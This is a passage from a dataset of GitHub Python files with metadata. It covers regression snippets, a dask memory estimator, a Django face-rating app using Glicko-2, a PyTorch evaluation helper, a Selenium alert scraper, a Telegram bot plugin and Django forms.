{"api_name": "werkzeug.wrappers.response.json", "line_number": 13, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response", "line_number": 13, "usage_type": "name"}, {"api_name": "werkzeug.wrappers.response", "line_number": 28, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 28, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response.json", "line_number": 30, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "8758506778", "text": "# Hazır kodlar \r\n\r\n# KARAR AGACI YAPISI \r\n\r\nfrom sklearn.tree import DecisionTreeRegressor\r\ndt = DecisionTreeRegressor(random_state=0)\r\ndt.fit(egitimx,egitimy)\r\n\r\ntahmin = dt .predict(testx)\r\n\r\nprint(\"KARAR AGACI R2 DEGERİ\")\r\nprint(r2_score(testy , tahmin))\r\n\r\n\r\n\r\n#RANDOM FOREST REGRESSİON\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nrf_reg = RandomForestRegressor(n_estimators=10, random_state=0)\r\nrf_reg.fit(X, y)\r\ntahmin= rf_reg.predict(X)\r\nprint(\"RASSAL ORMAN R2 DEGERİ\")\r\nprint(r2_score(testy,tahmin))\r\n\r\n#POLİNOM REGRESYON\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2) #degree degeri polinomun kaçıncı dereceden olacagını belirler \r\nx_poly = poly_reg.fit(trainx)\r\npoli = LinearRegression()\r\npoli.fit(x_poly,trainy)\r\ntahmin = poli.predict(poly_reg.fit_transform(testx))\r\nprint(\"POLİNOM REGRESYON R2 DEGERİ\")\r\nprint(r2_score(testy,poli.predict(poly_reg.fit_transform(testx))))\r\n\r\n\r\n#ÇAPRAZ DOGRULAMA \r\n\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\nkvs =cross_val_score(dt, trainx, trainy,cv=5)\r\nprint(\"ÇAPRAZ DOGRULAMA R2 SCORE\")\r\nprint(kvs)\r\nprint(np.mean(kvs))\r\n", "repo_name": "BeytullahArslann/Machine-Learning", "sub_path": "Hazır kodlar.py", "file_name": "Hazır kodlar.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 6, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "70398535847", "text": "import sys, json, argparse\n\nDEBUG = False\n\ndef get_theta(buffers_volumes, buffer_index, _3d_index, O, B):\n T = list()\n Cs = list()\n for dim in range(len(buffers_volumes[buffer_index].p1)):\n if B[dim] < O[dim]:\n C = 0 \n else: \n C = ((_3d_index[dim]+1) * B[dim]) % O[dim]\n # print(f'{((_3d_index[dim]+1) * B[dim])}mod{O[dim]} = {C}')\n if C == 0 and B[dim] != O[dim]: # particular case \n C = O[dim]\n\n if C < 0:\n raise ValueError(\"modulo should not return negative value\")\n\n Cs.append(C)\n T.append(B[dim] - C) \n \n if DEBUG: \n print(f'\\nProcessing buffer {buffer_index}')\n print(f'C: {Cs}')\n print(f'theta: {T}')\n\n return T, Cs\n \n\ndef get_arguments():\n \"\"\" Get arguments from console command.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument('config_filepath', \n action='store', \n type=str, \n help='Path to configuration file containing paths of third parties libraries, projects, data directories, etc. See README for more information.')\n return parser.parse_args()\n\n\ndef custom_imports(paths):\n def isempty(s):\n if s == \"\":\n return True \n return False \n\n for k, path in paths.items():\n if \"lib_\" in k and not isempty(path):\n sys.path.insert(0, path)\n\n\nif __name__ == \"__main__\":\n\n args = get_arguments()\n with open(args.config_filepath) as f:\n paths = json.load(f)\n custom_imports(paths)\n\n cases = [\n {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [650,500,500],\n \"B\": [390,600,700],\n \"volumestokeep\": [1,2,3]\n }, {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [390,300,350],\n \"O\": [650,500,700],\n \"B\": [390,600,700],\n \"volumestokeep\": [1,2,3]\n }, {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [390,300,350],\n \"O\": [325,250,250],\n \"B\": [195,300,350],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [780,3000,700],\n \"B\": [390,3000,700],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [780,3000,3500],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [3900,3000,3500],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [3900,3000,3500],\n \"O\": [780,600,700],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n }\n ]\n\n import dask_io\n from dask_io.optimizer.utils.utils import numeric_to_3d_pos\n from dask_io.optimizer.cases.resplit_utils import get_named_volumes, get_blocks_shape\n\n import logging\n import logging.config\n logging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True,\n })\n\n for case in cases:\n _type, R, O, I, B, volumestokeep = int(case[\"type\"]), tuple(case[\"R\"]), tuple(case[\"O\"]), tuple(case[\"I\"]), tuple(case[\"B\"]), case[\"volumestokeep\"]\n print(f'Current run ------ \\nType: {_type}\\nR: {R},\\nO: {O},\\nI: {I}\\nvolumestokeep: {volumestokeep}')\n\n buffers_partition = get_blocks_shape(R, B)\n buffers_volumes = get_named_volumes(buffers_partition, B)\n\n # find omega and theta max\n omega_max = [0,0,0]\n T_max = [0,0,0]\n for buffer_index in buffers_volumes.keys():\n _3d_index = numeric_to_3d_pos(buffer_index, buffers_partition, order='F')\n T, Cs = get_theta(buffers_volumes, buffer_index, _3d_index, O, B)\n\n for i in range(3):\n if Cs[i] > omega_max[i]:\n omega_max[i] = Cs[i]\n if T[i] > T_max[i]:\n T_max[i] = T[i]\n\n print(\"Omega max: \", omega_max)\n\n nb_bytes_per_voxel = 2\n buffersize = B[0]*B[1]*B[2]\n n = R[2]/B[2]\n N = R[1]/B[1] * R[2]/B[2]\n\n i, j, k = 0, 1, 2\n F1 = omega_max[k] * min(B[j],T_max[j]) * min(B[i],T_max[i])\n F2 = T_max[k] * max(0, min(B[j] - T_max[j] , omega_max[j])) * min(B[i], T_max[i])\n F3 = omega_max[k] * max(0, min(B[j] - T_max[j] , omega_max[j] )) * min(B[i] , T_max[i] )\n F4 = T_max[k] * T_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F5 = omega_max[k] * T_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F6 = T_max[k] * omega_max[1] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F7 = omega_max[k] * omega_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n\n print('F1:', F1)\n print('F2:', F2)\n print('F3:', F3)\n print('F4:', F4)\n print('F5:', F5)\n print('F6:', F6)\n print('F7:', F7)\n\n print('buffer size: ', buffersize*nb_bytes_per_voxel/1000000000, \"GB\")\n max_mem = (F1 + n*(F2 + F3) + N*(F4 + F5 + F6 + F7) + buffersize) * nb_bytes_per_voxel\n print(\"max_mem: \", max_mem/1000000000, \"GB\")", "repo_name": "GTimothee/dask_io_experiments", "sub_path": "dask_io_experiments/experiment_5/mem_calculator.py", "file_name": "mem_calculator.py", "file_ext": "py", "file_size_in_byte": 5490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.config.dictConfig", "line_number": 123, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 123, "usage_type": "attribute"}, {"api_name": "dask_io.optimizer.cases.resplit_utils.get_blocks_shape", "line_number": 132, "usage_type": "call"}, {"api_name": "dask_io.optimizer.cases.resplit_utils.get_named_volumes", "line_number": 133, "usage_type": "call"}, {"api_name": "dask_io.optimizer.utils.utils.numeric_to_3d_pos", "line_number": 139, "usage_type": "call"}]}
+{"seq_id": "25303634227", "text": "import random\nimport math\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404\nfrom facemash.models import FaceMash\n\n\ndef play(request):\n \"\"\" The main-page view of facemash app. \"\"\"\n try:\n contestants = FaceMash.objects.all()\n contestant_1 = random.choice(contestants)\n contestant_2 = random.choice(contestants)\n # A while loop to ensure that the contestants aren't same.\n while contestant_1 == contestant_2:\n contestant_2 = random.choice(contestants)\n args = {'contestant_1': contestant_1, 'contestant_2': contestant_2}\n except IndexError:\n error = True\n args = {'error': error}\n return render(request, 'facemash.html', args) \n\ndef ratings_calculator(request, winner_id, loser_id):\n \"\"\"\n This view is the HEART of facemash app. This is where all the calculations\n for the ratings are done. This is where the algorithm is.\n \"\"\"\n try:\n winner = FaceMash.objects.get(id=winner_id)\n loser = FaceMash.objects.get(id=loser_id)\n w = winner\n l = loser\n\n TAU = 0.5 # System constant\n # score = s\n s_w = 1.0\n s_l = 0.0\n # mu\n mu_w = (w.ratings - 1500.0)/173.7178\n mu_l = (l.ratings - 1500.0)/173.7178\n # phi\n phi_w = w.rd/173.7178\n phi_l = l.rd/173.7178\n # g(phi) = g\n g_w = 1.0/math.sqrt(1.0 + 3.0*pow(phi_w, 2)/pow(math.pi, 2))\n g_l = 1.0/math.sqrt(1.0 + 3.0*pow(phi_l, 2)/pow(math.pi, 2))\n # E = E\n E_w = 1.0/(1.0 + math.exp(-g_w*(mu_w - mu_l)))\n E_l = 1.0/(1.0 + math.exp(-g_l*(mu_l - mu_w)))\n # nu\n nu_w = 1.0/(pow(g_l, 2)*E_w*(1 - E_w))\n nu_l = 1.0/(pow(g_w, 2)*E_l*(1 - E_l))\n # delta = delta\n delta_w = nu_w*g_l*(s_w - E_w) # s_w = 1\n delta_l = nu_l*g_w*(s_l - E_l) # s_l = 0\n # a = a\n a_w = math.log(pow(w.sigma, 2), math.e)\n a_l = math.log(pow(l.sigma, 2), math.e)\n\n # f(x) = function_x\n def function_x(x, delta, phi, nu, a):\n \"\"\"\n This function corresponds to f(x) in Glicko-2 Algorithm.\n \"\"\"\n\n e_x = math.exp(x)\n multi = pow(delta, 2) - pow(phi, 2) - nu - math.exp(x)\n divi = 2.0*pow((phi+nu+e_x), 2)\n minus = (x-a)/pow(TAU, 2)\n result = e_x*multi/divi - minus\n return result\n\n EPSILON = 0.000001 # Convergence tolerance\n # Calculate for w (winner).\n A_w = a_w\n if pow(delta_w, 2) > (pow(phi_w, 2) + nu_w):\n B_w = math.log((pow(delta_w, 2) - pow(phi_w, 2) - nu_w), math.e)\n else:\n k = 1\n x = a_w - k*TAU\n f_x = function_x(x, delta_w, phi_w, nu_w, a_w)\n while f_x < 0:\n k += 1\n x = a_w - k*TAU\n function_x(x, delta_w, phi_w, nu_w, a_w)\n B_w = a_w - k*TAU\n\n # find f(A_w)\n f_A_w = function_x(A_w, delta_w, phi_w, nu_w, a_w)\n # find f(B_w)\n f_B_w = function_x(B_w, delta_w, phi_w, nu_w, a_w)\n\n while abs(B_w - A_w) > EPSILON:\n C_w = A_w + (A_w-B_w)*f_A_w/(f_B_w-f_A_w)\n # find f(C_w)\n f_C_w = function_x(C_w, delta_w, phi_w, nu_w, a_w)\n if f_C_w*f_B_w < 0:\n A_w = B_w\n f_A_w = f_B_w\n else:\n f_A_w = f_A_w/2.0\n B_w = C_w\n f_B_w = f_C_w\n # sigmama-dash = sigma_2\n sigma_2_w = math.exp(A_w/2.0)\n # phi-star = p_s\n p_s_w = math.sqrt(pow(phi_w, 2)+pow(sigma_2_w, 2))\n # calculate for l (loser)\n A_l = a_l\n if pow(delta_l, 2) > (pow(phi_l, 2) + nu_l):\n B_l = math.log((pow(delta_l, 2) - pow(phi_l, 2) - nu_l), math.e)\n else:\n k = 1\n x = a_l - k*TAU\n f_x = function_x(x, delta_l, phi_l, nu_l, a_l)\n while f_x < 0:\n k += 1\n x = a_l - k*TAU\n function_x(x, delta_l, phi_l, nu_l, a_l)\n B_l = a_l - k*TAU\n # find f(A_l)\n f_A_l = function_x(A_l, delta_l, phi_l, nu_l, a_l)\n # find f(B_l)\n f_B_l = function_x(B_l, delta_l, phi_l, nu_l, a_l)\n while abs(B_l - A_l) > EPSILON:\n C_l = A_l + (A_l-B_l)*f_A_l/(f_B_l-f_A_l)\n # find f(C_l)\n f_C_l = function_x(C_l, delta_l, phi_l, nu_l, a_l)\n if f_C_l*f_B_l < 0:\n A_l = B_l\n f_A_l = f_B_l\n else:\n f_A_l = f_A_l/2.0\n B_l = C_l\n f_B_l = f_C_l\n # sigmama-dash = sigma_2\n sigma_2_l = math.exp(A_l/2.0)\n # phi-star = p_s\n p_s_l = math.sqrt(pow(phi_l, 2)+pow(sigma_2_l, 2))\n # phi-dash = p_2\n p_2_w = 1.0/math.sqrt(1.0/pow(p_s_w, 2) + 1.0/nu_w)\n p_2_l = 1.0/math.sqrt(1.0/pow(p_s_l, 2) + 1.0/nu_l)\n # mu-dash = u_2\n u_2_w = mu_w + pow(p_s_w, 2)*g_l*(s_w - E_w)\n u_2_l = mu_l + pow(p_s_l, 2)*g_w*(s_l - E_l)\n # convert back to orignial ratings\n w.ratings = 173.7178*u_2_w + 1500\n w.sigma = sigma_2_w\n l.ratings = 173.7178*u_2_l + 1500\n l.sigma = sigma_2_l\n\n # As pointed out by the author of Glicko-2, rd (rating deviation)\n # should not go below 30.\n # Therefore, below make a check for that.\n\n w.rd = 173.7178*p_2_w # New rd of winner\n if w.rd < 30:\n w.rd = 30\n l.rd = 173.7178*p_2_l # New rd of loser\n if l.rd < 30:\n l.rd = 30\n # Save the new ratings, rd and volatality for both winner and loser.\n w.save()\n l.save()\n # Redirect back to the Play page\n return HttpResponseRedirect('/facemash/')\n except FaceMash.DoesNotExist:\n raise Http404\n\n\ndef ratings_page(request):\n \"\"\" The ratings-page view. \"\"\"\n\n faces = FaceMash.objects.all().order_by('-ratings')\n return render(request, \"ratings_page.html\", {'faces' : faces})\n\n", "repo_name": "bhch/django-facemash", "sub_path": "facemash/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "facemash.models.FaceMash.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 11, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 12, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 13, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 29, "usage_type": "name"}, {"api_name": "facemash.models.FaceMash.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 30, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 45, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 45, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 46, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 48, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 49, "usage_type": "call"}, {"api_name": "math.log", "line_number": 57, "usage_type": "call"}, {"api_name": "math.e", "line_number": 57, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 58, "usage_type": "call"}, {"api_name": "math.e", "line_number": 58, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 66, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 67, "usage_type": "call"}, {"api_name": "math.log", "line_number": 77, "usage_type": "call"}, {"api_name": "math.e", "line_number": 77, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 105, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 107, "usage_type": "call"}, {"api_name": "math.log", "line_number": 111, "usage_type": "call"}, {"api_name": "math.e", "line_number": 111, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 137, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 166, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.DoesNotExist", "line_number": 167, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 167, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 168, "usage_type": "name"}, {"api_name": "facemash.models.FaceMash.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 174, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 175, "usage_type": "call"}]}
+{"seq_id": "29400977666", "text": "import context\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.utils.data\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom typing import Optional, Tuple\n\n\ndef eval_logits_on_dataset(model: nn.Module, dataset: Dataset, batch_size: int = 128,\n device: Optional[torch.device] = None,\n num_workers: int = 4) -> Tuple[torch.tensor, torch.tensor]:\n \"\"\"\n Takes a model and an evaluation dataset, and returns the logits\n output by the model on that dataset as an array\n :param model: torch.nn.Module that outputs model logits\n :param dataset: pytorch dataset with inputs and labels\n :param batch_size: int\n :param device: device to use for evaluation\n :param num_workers: int, num. workers for the data loader\n :return: stacked torch tensor of logits returned by the model\n on that dataset, and the labels\n \"\"\"\n # Set model in eval mode\n model.eval()\n\n testloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=num_workers)\n logits_list = []\n labels_list = []\n with torch.no_grad():\n for i, data in enumerate(testloader, 0):\n # Get inputs\n inputs, labels = data\n if device is not None:\n inputs, labels = map(lambda x: x.to(device),\n (inputs, labels))\n logits = model(inputs)\n logits_list.append(logits)\n labels_list.append(labels)\n\n logits = torch.cat(logits_list, dim=0)\n labels = torch.cat(labels_list, dim=0)\n return logits.cpu(), labels.cpu()\n", "repo_name": "KaosEngineer/PriorNetworks", "sub_path": "prior_networks/evaluation.py", "file_name": "evaluation.py", "file_ext": "py", "file_size_in_byte": 1657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 13, "usage_type": "attribute"}]}
+{"seq_id": "38919389340", "text": "from time import sleep\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\r\nfrom selenium.webdriver.common.by import By\r\n\r\nfrom helpers.file_manager import FileManager\r\nfrom helpers.file_manager import FILE_PATH\r\n\r\nimport csv\r\nimport random\r\n\r\nclass UtScrapper():\r\n def __init__(self) -> None:\r\n self.ff_options = FirefoxOptions()\r\n self.ff_options.headless = True\r\n self.driver = webdriver.Firefox(options=self.ff_options)\r\n\r\n self.fm = FileManager()\r\n self.fm.check_file()\r\n\r\n async def scrape_ut(self, weburl):\r\n self.driver.get(weburl)\r\n\r\n try:\r\n existent_elements = list(csv.DictReader(open('./data/ut_scrapper.csv', 'r')))\r\n new_element_list = []\r\n\r\n for e in range(10, 0, -1):\r\n element = self.driver.find_element(By.CSS_SELECTOR, 'div.alert-sm:nth-child({})'.format(e))\r\n e_text = str(element.text).split(' ')\r\n e_title = ''\r\n e_date = e_text[0]\r\n e_link = self.driver.find_element(By.CSS_SELECTOR, 'div.alert-sm:nth-child({}) > strong > a'.format(e)).get_attribute('href')\r\n e_flag = False\r\n \r\n for i in range(1,len(e_text)):\r\n if i == 1:\r\n e_title = e_title + e_text[i]\r\n else:\r\n e_title = e_title + ' ' + e_text[i]\r\n \r\n for row in existent_elements:\r\n if row['title'] == e_title and row['date'] == e_date:\r\n e_flag = True\r\n break\r\n\r\n if e_flag == True:\r\n print(\"Element already in file\")\r\n else:\r\n self.fm.write_file(title=e_title, date=e_date, link=e_link)\r\n new_element = {'title': e_title, 'date': e_date, 'link': e_link}\r\n new_element_list.append(new_element)\r\n print(\"---->New element added to the file\")\r\n\r\n print (\"The file has been saved\")\r\n sleep(random.randint(4, 13))\r\n self.driver.close()\r\n return(new_element_list)\r\n\r\n except:\r\n print (\"Element not found\")\r\n sleep(random.randint(4, 13))\r\n self.driver.close()", "repo_name": "Socterean/UT-bot4445", "sub_path": "helpers/ut_scrapper.py", "file_name": "ut_scrapper.py", "file_ext": "py", "file_size_in_byte": 2391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.firefox.options.Options", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 16, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 16, "usage_type": "name"}, {"api_name": "helpers.file_manager.FileManager", "line_number": 18, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 62, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "36617698954", "text": "import numpy as np\nfrom skimage.measure import block_reduce\n\ndef crop_and_resize(img, target_size=32, zoom=1):\n small_side = int(np.min(img.shape) * zoom)\n reduce_factor = int(small_side / target_size)\n #print(reduce_factor)\n crop_size = target_size * reduce_factor\n mid = np.array(img.shape) // 2\n mid = mid.astype(np.int)\n half_crop = int(crop_size // 2)\n #print(half_crop)\n #half_crop = half_crop.astype(np.int)\n center = img[mid[0]-half_crop:mid[0]+half_crop,\n \tmid[1]-half_crop:mid[1]+half_crop]\n return block_reduce(center, (reduce_factor, reduce_factor), np.mean)\n", "repo_name": "sayands/deep-learning-projects", "sub_path": "SMILE-CNN/utils/crop_and_resize.py", "file_name": "crop_and_resize.py", "file_ext": "py", "file_size_in_byte": 607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.min", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 10, "usage_type": "attribute"}, {"api_name": "skimage.measure.block_reduce", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 16, "usage_type": "attribute"}]}
+{"seq_id": "12937801107", "text": "import os\n\nfrom babel import Locale\nfrom pyrogram.enums import ChatType\nfrom pyrogram.types import Message\n\nfrom ..bot import Client\nfrom ..database.chats import add_chat, get_chat\n\nLanguages: list[str] = [] # Loaded Locales\n\nfor file in os.listdir(\"twittergram/locales\"):\n if file not in (\"__init__.py\", \"__pycache__\"):\n Languages.append(file.replace(\".yaml\", \"\"))\n\n\n# This is the first plugin run to guarantee\n# that the actual chat is initialized in the DB.\n@Client.on_message(group=-1)\nasync def check_chat(client: Client, message: Message):\n chat = message.chat\n user = message.from_user\n\n try:\n language_code = str(Locale.parse(user.language_code, sep=\"-\"))\n except (AttributeError, TypeError):\n language_code: str = \"en_US\"\n\n if language_code not in Languages:\n language_code: str = \"en-us\"\n\n if user and await get_chat(user.id, ChatType.PRIVATE) is None:\n await add_chat(user.id, language_code, ChatType.PRIVATE)\n\n if await get_chat(chat.id, chat.type) is None:\n await add_chat(chat.id, language_code, chat.type)\n", "repo_name": "ruizlenato/twittergram", "sub_path": "twittergram/plugins/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1088, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "bot.Client", "line_number": 20, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 20, "usage_type": "name"}, {"api_name": "babel.Locale.parse", "line_number": 25, "usage_type": "call"}, {"api_name": "babel.Locale", "line_number": 25, "usage_type": "name"}, {"api_name": "database.chats.get_chat", "line_number": 32, "usage_type": "call"}, {"api_name": "pyrogram.enums.ChatType.PRIVATE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pyrogram.enums.ChatType", "line_number": 32, "usage_type": "name"}, {"api_name": "database.chats.add_chat", "line_number": 33, "usage_type": "call"}, {"api_name": "pyrogram.enums.ChatType.PRIVATE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pyrogram.enums.ChatType", "line_number": 33, "usage_type": "name"}, {"api_name": "database.chats.get_chat", "line_number": 35, "usage_type": "call"}, {"api_name": "database.chats.add_chat", "line_number": 36, "usage_type": "call"}, {"api_name": "bot.Client.on_message", "line_number": 19, "usage_type": "call"}, {"api_name": "bot.Client", "line_number": 19, "usage_type": "name"}]}
+{"seq_id": "12394356549", "text": "from django import forms\nfrom home.models import Book,Author,Genre\n\n\nclass BookForms(forms.Form):\n class Meta:\n book=Book\n fields=('name','genre','purchase_date','author')\n \n title=forms.ModelChoiceField(\n queryset=Book.objects.all(),\n empty_label='Title',widget=forms.Select(attrs={'name':'book','id':'book',\n 'class':'custom-select'})\n )\n\n author=forms.ModelChoiceField(\n queryset=Author.objects.all(),\n empty_label='Author',widget=forms.Select(attrs={'name':'author','id':'author',\n 'class':'custom-select'})\n )\n purchase_date = forms.DateField(label='',widget=forms.DateInput(\n attrs={'placeholder':'Purchase_Date','name':'date','id':'date','class':'form-control'}))\n \n\n genre=forms.ModelMultipleChoiceField(queryset=Genre.objects.all(), widget=forms.CheckboxSelectMultiple)\n\nclass SearchForm(forms.Form):\n q=forms.CharField(label='',\n widget=forms.TextInput(attrs={'placeholder':'search','maxlength':'30',\n 'class':'form-control'}))\n", "repo_name": "dikshaRaj/Diksha", "sub_path": "home/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1053, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "home.models.Book", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "home.models.Book.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "home.models.Book.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "home.models.Book", "line_number": 11, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "home.models.Author.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "home.models.Author.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "home.models.Author", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.DateInput", 